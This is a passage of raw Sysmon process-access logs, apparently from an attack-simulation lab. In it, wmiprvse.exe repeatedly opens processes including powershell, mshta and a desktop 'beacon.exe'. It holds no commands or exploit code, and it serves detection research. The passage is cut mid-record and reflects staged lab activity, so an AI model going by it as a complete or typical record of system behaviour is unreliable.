Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000001698028Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.052{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F06E77AA64733C9060BE4E02B1A0F7E3,SHA256=A61769E7DE54FEB89AE90D48BDCA5B3FB0E00F22EF50F69B24F8556217950F7E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001698027Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698026Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698025Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698024Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698023Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.036{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698022Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.036{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698021Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.036{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698020Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.036{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698019Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.036{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698018Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.036{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698017Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.036{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698016Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.036{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698015Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.036{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698014Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.036{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698013Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.036{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698012Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.036{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698011Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.036{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698010Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.036{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698009Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.036{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPC